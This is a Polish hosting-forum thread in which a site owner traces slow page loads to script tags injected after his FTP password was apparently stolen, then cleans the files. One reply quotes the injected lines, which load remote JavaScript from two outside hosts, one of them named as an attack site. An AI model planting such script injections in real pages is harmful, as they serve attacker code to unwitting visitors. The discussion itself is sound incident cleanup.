wolne ładowanie strony

Tutaj należy zgłaszać problemy z działaniem serwisu.

wolne ładowanie strony

Postprzez davidpog1 » N maja 15, 11 09:13

Strasznie wolno ładuje mi się strona od paru dni. Na pasku pokazuje mi, np . oczekiwanie na kalphuvri.com czy jakiś inny adres strona ładuję się okropnie długo, a wcześniej było ok. Wie może ktoś o co chodzi. A to adres strony przedszkole-pustkow.ugu.pl :?
davidpog1

Re: wolne ładowanie strony

Postprzez dpkradom » N maja 15, 11 18:44

Strona łączy się z wieloma hostami, które mogą być niedostępne. Np.:

Kod: Zaznacz cały
<script type="text/javascript" src="http://hemenogren.net/facebook.php"></script><script type="text/javascript" src="http://gamefountain.com/js.php">

Są to zewnętrzne kody javascript, które mogą kontrolować wszystko co dzieje się na stronie. Spróbowałbym je usunąć. Dodatkowo umieszczone są w niedozwolonym dla nich miejscu ... Przyjrzałbym się temu dokładnie w edytorze html i najpierw to zakomentował <!-- --> A jak strona będzie działać to wyrzucił ! Wygląda to jak złośliwy kod doklejony przez jakiegoś dowcipnisia.
---------------------------------- EDIT -----------------------------------
Sprawdziłem właśnie przed chwilą te dwa skrypty:
- Pierwszy host w ogóle nie odpowiada (stąd takie długie łączenie)
- Drugi to strona dokonująca ataków ...

Morał jest krótki -> Ktoś grzebał w kodzie joomla.
dpkradom

Postprzez ugu » N maja 15, 11 22:34

Wygląda na to że masz na komputerze wirusa który wykradł twoje hasło do konta FTP i podmienił pliki na koncie.
Usuń wirusy z komputera, zmień hasła i wgraj kopię zapasową strony.
ugu
Site Admin

Postprzez davidpog1 » N maja 29, 11 15:18

dzięki, już jest ok. W każdym pliku index.html oraz default.php miałem właśnie takie skrypty. Pierwszym rzędzie plików po dwa przekierowania, w drugim po jednym, a im dalej w drzewie to pliki były już nienaruszone. Usuwałem ręcznie 4 godziny. Patrzyłem po prostu na datę, bo każdy naruszony plik miał datę edycji z 23 kwietnia, lub wielkość pliku w przypadku index.html. Oczywiście w pierwszej kolejności zeskanowałem komputer i zmieniłem hasło do ftp. Pozdrawiam :P
davidpog1

Powrót do UGU.PL

Copyright © 2007-2011 ugu.pl
Wszelkie prawa zastrzeżone.
Polityka prywatności